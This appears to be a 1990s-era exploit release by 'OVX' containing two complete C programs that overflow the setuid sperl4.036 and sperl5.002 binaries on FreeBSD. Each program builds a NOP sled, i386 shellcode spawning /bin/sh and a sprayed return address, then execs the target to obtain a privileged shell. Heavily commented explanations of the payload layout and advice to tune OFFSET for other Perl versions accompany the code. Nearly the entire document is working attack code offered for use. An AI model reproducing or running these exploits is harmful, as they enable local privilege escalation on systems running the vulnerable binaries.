The first program works on perl4.036 and the second on perl5.002 ...
With a small modification of the OFFSET value you can overflow all versions up
to perl5.003.
------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/* Exploit for FreeBSD sperl4.036 by OVX */
/************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER_SIZE 1400
#define OFFSET 600
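/*
 * get_esp - return the stack pointer as seen inside this function.
 *
 * The exploit uses it as an anchor for guessing where the NOP sled in
 * buf ends up on sperl's stack (see OFFSET). The number is only
 * meaningful in a 32-bit x86 process, which is what the targeted
 * FreeBSD sperl binaries are; on x86-64 the asm still assembles but
 * yields the low 32 bits of %rsp.
 *
 * The original body was `asm("movl %esp,%eax");` with no return
 * statement, i.e. it relied on %eax happening to be the return
 * register. That is undefined behaviour in C and breaks under
 * optimisation, so the value is now moved into a named output
 * operand and returned explicitly. `%k0` prints the 32-bit name of
 * whatever register the compiler picked, on both x86 targets.
 */
char *get_esp(void) {
    unsigned long sp;
#if defined(__i386__) || defined(__x86_64__)
    __asm__ __volatile__("movl %%esp,%k0" : "=r"(sp));
#else
    /* Not x86, so there is no %esp; use the frame address as a nearby
     * stack address so the listing still builds. The exploit itself is
     * x86-only. */
    sp = (unsigned long)__builtin_frame_address(0);
#endif
    return (char *)sp;
}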
/* Payload handed to sperl as argv[1]: NOP sled, then shellcode, with the
 * remainder sprayed with the guessed return address. File scope, so every
 * byte the loops below do not touch stays zero: the C string sperl sees
 * ends at the first untouched (or zero address) byte, not necessarily at
 * buf[BUFFER_SIZE-1]. */
char buf[BUFFER_SIZE];
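/*
 * Build the overflow payload and exec the setuid sperl4.036 binary with
 * it as its single argument.
 *
 * Layout of buf (BUFFER_SIZE bytes, passed as argv[1]):
 *   [1 .. ~BUFFER_SIZE-4]  guessed return address get_esp() - OFFSET,
 *                          repeated every 4 bytes starting at byte 1
 *                          (the 5.00X version starts at byte 0; the
 *                          one-byte shift presumably matches this
 *                          target's argument alignment - the code does
 *                          not say)
 *   [0 .. 768]             then overwritten with 0x90 (NOP sled)
 *   [769 .. 769+len-1]     execshell copied over the end of the sled
 *   [BUFFER_SIZE-1]        forced to NUL
 *
 * execshell is shellcode that embeds "/bin/sh" and contains no NUL
 * byte, so strlen() returns its full length and the payload survives
 * as one C string. OFFSET is a per-target guess at the distance between
 * our stack pointer and the sled in the exec'd process; that is the
 * value the header says to tune for other perl versions.
 *
 * Assumes a 32-bit x86 build: the address step is 4 bytes and the
 * shellcode is i386 FreeBSD code.
 *
 * Returns 1 if execl() fails; execl() does not return on success.
 */
int main(int argc, char *argv[])
{
    /* The sled runs up to and including byte 768; shellcode starts at 769. */
    enum { SLED_END = 768 + 1 };
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    char *ret;
    int i;

    (void)argc;
    (void)argv;

    /* get_esp() sees the same stack pointer on every call from here, so
     * compute the guess once. */
    ret = get_esp() - OFFSET;

    /* Spray the guessed address over the whole buffer, starting one byte
     * in. memcpy avoids the misaligned, type-punned store of the original
     * and never writes past the end of buf whatever sizeof(ret) is. */
    for (i = 0 + 1; i + (int)sizeof ret < BUFFER_SIZE; i += 4)
        memcpy(&buf[i], &ret, sizeof ret);

    /* Sled and shellcode go over the front of the sprayed addresses. */
    memset(buf, 0x90, SLED_END);
    memcpy(&buf[SLED_END], execshell, strlen(execshell));
    buf[BUFFER_SIZE - 1] = 0;

    execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, (char *)NULL);

    /* Only reached if the exec itself failed (missing binary, EACCES...). */
    perror("execl");
    return 1;
}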
------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/* Exploit for FreeBSD sperl5.00X by OVX */
/************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER_SIZE 1400
#define OFFSET 1000
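/*
 * get_esp - return the stack pointer as seen inside this function.
 *
 * The exploit uses it as an anchor for guessing where the NOP sled in
 * buf ends up on sperl's stack (see OFFSET). The number is only
 * meaningful in a 32-bit x86 process, which is what the targeted
 * FreeBSD sperl binaries are; on x86-64 the asm still assembles but
 * yields the low 32 bits of %rsp.
 *
 * The original body was `asm("movl %esp,%eax");` with no return
 * statement, i.e. it relied on %eax happening to be the return
 * register. That is undefined behaviour in C and breaks under
 * optimisation, so the value is now moved into a named output
 * operand and returned explicitly. `%k0` prints the 32-bit name of
 * whatever register the compiler picked, on both x86 targets.
 */
char *get_esp(void) {
    unsigned long sp;
#if defined(__i386__) || defined(__x86_64__)
    __asm__ __volatile__("movl %%esp,%k0" : "=r"(sp));
#else
    /* Not x86, so there is no %esp; use the frame address as a nearby
     * stack address so the listing still builds. The exploit itself is
     * x86-only. */
    sp = (unsigned long)__builtin_frame_address(0);
#endif
    return (char *)sp;
}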
/* Payload handed to sperl as argv[1]: NOP sled, then shellcode, with the
 * remainder sprayed with the guessed return address. File scope, so every
 * byte the loops below do not touch stays zero: the C string sperl sees
 * ends at the first untouched (or zero address) byte, not necessarily at
 * buf[BUFFER_SIZE-1]. */
char buf[BUFFER_SIZE];
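/*
 * Build the overflow payload and exec the setuid sperl5.002 binary with
 * it as its single argument.
 *
 * Layout of buf (BUFFER_SIZE bytes, passed as argv[1]):
 *   [0 .. ~BUFFER_SIZE-5]  guessed return address get_esp() - OFFSET,
 *                          repeated every 4 bytes from byte 0
 *   [0 .. 767]             then overwritten with 0x90 (NOP sled)
 *   [768 .. 768+len-1]     execshell copied over the end of the sled
 *   [BUFFER_SIZE-1]        forced to NUL
 *
 * execshell is shellcode that embeds "/bin/sh" and contains no NUL
 * byte, so strlen() returns its full length and the payload survives
 * as one C string. OFFSET is a per-target guess at the distance between
 * our stack pointer and the sled in the exec'd process; that is the
 * value the header says to tune for other perl versions (up to 5.003).
 *
 * Assumes a 32-bit x86 build: the address step is 4 bytes and the
 * shellcode is i386 FreeBSD code.
 *
 * Returns 1 if execl() fails; execl() does not return on success.
 */
int main(int argc, char *argv[])
{
    /* The sled covers bytes 0..767; shellcode starts at 768. */
    enum { SLED_END = 768 };
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    char *ret;
    int i;

    (void)argc;
    (void)argv;

    /* get_esp() sees the same stack pointer on every call from here, so
     * compute the guess once. */
    ret = get_esp() - OFFSET;

    /* Spray the guessed address over the whole buffer. memcpy avoids the
     * misaligned, type-punned store of the original and never writes past
     * the end of buf whatever sizeof(ret) is. */
    for (i = 0; i + (int)sizeof ret < BUFFER_SIZE; i += 4)
        memcpy(&buf[i], &ret, sizeof ret);

    /* Sled and shellcode go over the front of the sprayed addresses. */
    memset(buf, 0x90, SLED_END);
    memcpy(&buf[SLED_END], execshell, strlen(execshell));
    buf[BUFFER_SIZE - 1] = 0;

    execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, (char *)NULL);

    /* Only reached if the exec itself failed (missing binary, EACCES...). */
    perror("execl");
    return 1;
}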
------------cut-------------cut-------------cut------------cut------------
PS: Pozdrowienia dla wszystkich polskich hackerow ...
//////////////////////////////////////////////////////////////////////////
// ANY QUESTIONS ? //
// OVX - deliver@free.polbox.pl //
//////////////////////////////////////////////////////////////////////////